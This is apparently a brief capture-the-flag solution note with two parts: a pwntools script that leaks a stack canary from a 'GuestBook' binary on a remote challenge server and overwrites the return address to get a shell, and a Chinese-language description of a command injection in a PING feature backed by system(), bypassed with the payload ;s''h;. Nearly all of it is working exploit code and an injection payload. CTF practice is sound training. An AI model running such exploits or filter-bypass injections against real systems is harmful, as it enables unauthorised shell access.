das
pwn1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
| from pwn import *
context(arch='amd64', log_level='debug', os='linux')
#p = process("./GuestBook")
p=remote("node4.buuoj.cn",27600)
payload=b'a'*0x18+b'^'
p.sendafter("Please input your name: ",payload)
p.recvuntil("^")
canary=p.recv(7)
print(canary)
p.sendlineafter("(MAX 4): ",b'3')
sleep(1)
payload=b'a'*(0xA8)+p64(0x0000000004012C3)
# attach(p,
# '''
# b *0x40147d
# c
# '''
# )
p.sendline(payload)
payload=b'a'*(0xA0-0x20-8)+b'a'+canary
p.sendline(payload)
payload=b'a'*(0xA0-0x40-8)
p.sendline(payload)
p.interactive()
|
pwn2
PING指令里面有漏洞,本质是一个system函数,用两个;屏蔽前后的文本,再利用两个单引号绕过字符串检查
;s’’h;
